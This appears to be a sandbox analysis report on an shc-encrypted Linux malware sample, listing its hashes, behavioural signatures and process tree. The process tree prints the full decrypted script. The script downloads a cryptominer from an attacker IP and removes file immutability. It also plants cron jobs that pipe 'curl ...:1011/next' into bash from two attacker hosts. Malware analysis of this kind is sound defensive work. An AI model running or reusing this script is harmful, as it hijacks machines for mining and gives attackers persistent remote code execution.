Overview

overview

10

Static

static

10

样本/Lin...9DC1D8

ubuntu-24.04-amd64

7

样本/Lin...B36C5B

ubuntu-24.04-amd64

6

样本/Lin...E3B383

ubuntu-24.04-amd64

8

样本/Lin...6F5973

ubuntu-24.04-amd64

3

样本/Lin...776DB8

ubuntu-18.04-amd64

1

样本/Lin...776DB8

debian-9-armhf

1

样本/Lin...776DB8

debian-9-mips

1

样本/Lin...776DB8

debian-9-mipsel

1

样本/Lin...C9A3F7

ubuntu-18.04-amd64

6

样本/Lin...C9A3F7

debian-9-armhf

6

样本/Lin...C9A3F7

debian-9-mips

6

样本/Lin...C9A3F7

debian-9-mipsel

6

样本/Lin...FECBE5

ubuntu-22.04-amd64

10

1AAF1A9F78...31.tar

windows7-x64

1

1AAF1A9F78...31.tar

windows10-2004-x64

1

xrx/chattr

ubuntu-24.04-amd64

1

xrx/config.json

windows7-x64

3

xrx/config.json

windows10-2004-x64

3

xrx/init.sh

ubuntu-22.04-amd64

6

xrx/init0

ubuntu-24.04-amd64

8

xrx/key

windows7-x64

1

xrx/key

windows10-2004-x64

1

xrx/scp

ubuntu-18.04-amd64

1

xrx/scp

debian-9-armhf

1

xrx/scp

debian-9-mips

1

xrx/scp

debian-9-mipsel

1

xrx/secure

ubuntu-24.04-amd64

7

xrx/uninstall.sh

ubuntu-18.04-amd64

6

xrx/uninstall.sh

debian-9-armhf

6

xrx/uninstall.sh

debian-9-mips

6

xrx/uninstall.sh

debian-9-mipsel

6

xrx/xrx

ubuntu-18.04-amd64

6

Resubmissions

02/12/2024, 02:52 UTC

241202-dcyx7s1lfk 10

Analysis

  • max time kernel
    132s
  • max time network
    145s
  • platform
    ubuntu-24.04_amd64
  • resource
    ubuntu2404-amd64-20240523-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
  • submitted
    02/12/2024, 02:52 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

  • Size

    1023KB

  • MD5

    069ad3938c3f9c049f670a8eb49dc1d8

  • SHA1

    f4fd0c87a18d45ab4b642f32a94673c949ab7caf

  • SHA256

    84d4b99f0d98900b4eadb7e107bf54196f2e5796d8707ebf0dcd76f5b6693295

  • SHA512

    3c627883f53082face65b22d353c1926c4d4f4de008cf41cf2a3326762ad080dd95324f2fd35c3f60c069df4fb2c510d4fa07b26cbc404678f8a655c884beedb

  • SSDEEP

    12288:SBgtRmLBGYhFcueTIqRe/w/Yt6myOP7/x7L15k7bKrHNq9EnE:SQRmLBTFcueTIie/wgB/x7LFLNq9

Score
7/10
defense_evasiondiscovery

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Attempts to change immutable files 2 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 1 IoCs
    discovery
  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery

Processes

  • /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
    /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
    1⤵
      PID:2442
    • /bin/bash
      /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c "exec '/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8' \"\$@\"" /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
      1⤵
        PID:2442
      • /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
        /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
        1⤵
          PID:2442
        • /bin/bash
          /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c " #!/bin/bash ifrunning=\$(pgrep xrx) ######################## ######################## downloadminer(){ link1=\"http://185.252.178.82:6972/xrx/xrx\" link2=\"http://185.252.178.82:6972/configs/config-xrx.json\" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O \$link1 || cd1 -L -O \$link1 || wget \$link1 --no-check-certificate curl -L -O \$link2 || cd1 -L -O \$link2 || wget \$link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( \$EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo \"@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"*/30 * * * * curl 185.252.178.82:1011/next | bash \" >> .spark sleep 1 echo \"*/30 * * * * curl load.whitesnake.church:1011/next | bash \" >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( \$EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo \"@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"*/30 * * * * root curl 185.252.178.82:1011/next | bash \" >> /etc/crontab echo \"*/30 * * * * root curl load.whitesnake.church:1011/next | bash \" >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print \$5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo \"miner intact\" else echo \"miner not found,downloading...\" downloadminer fi if [[ \"\$fsiz\" -gt 0 ]]; then echo \"miner size intact\" else echo \"filesize 0,downloading...\" downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z \"\$ifrunning\" ; then echo \"xrx not running,starting...\" /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e \"pid:\" pgrep xrx fi " /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
          1⤵
          • File and Directory Permissions Modification
          PID:2442
          • /usr/bin/pgrep
            pgrep xrx
            2⤵
            • Reads CPU attributes
            • Enumerates kernel/hardware configuration
            • Reads runtime system information
            PID:2444
          • /usr/bin/ls
            ls -l /var/tmp/.xrx/xrx
            2⤵
              PID:2446
            • /usr/bin/awk
              awk "{print \$5}"
              2⤵
                PID:2447
              • /usr/bin/mkdir
                mkdir /var/tmp/.xrx
                2⤵
                  PID:2448
                • /usr/bin/chattr
                  chattr -ia /var/tmp/.xrx/xrx
                  2⤵
                  • Attempts to change immutable files
                  PID:2449
                • /usr/bin/chattr
                  chattr -ia /var/tmp/.xrx/config.json
                  2⤵
                  • Attempts to change immutable files
                  PID:2450
                • /usr/bin/rm
                  rm -rf /var/tmp/.xrx/xrx
                  2⤵
                    PID:2451
                  • /usr/bin/rm
                    rm -rf /var/tmp/.xrx/config.json
                    2⤵
                      PID:2452
                    • /usr/bin/curl
                      curl -L -O http://185.252.178.82:6972/xrx/xrx
                      2⤵
                        PID:2453
                      • /usr/bin/wget
                        wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate
                        2⤵
                          PID:2497

                      Network

                        No results found
                      • 185.252.178.82:6972
                        660 B
                         11
                      • 185.252.178.82:6972
                        480 B
                         8
                      • 224.0.0.251:5353
                        146 B
                         2

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      We care about your privacy.

                      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.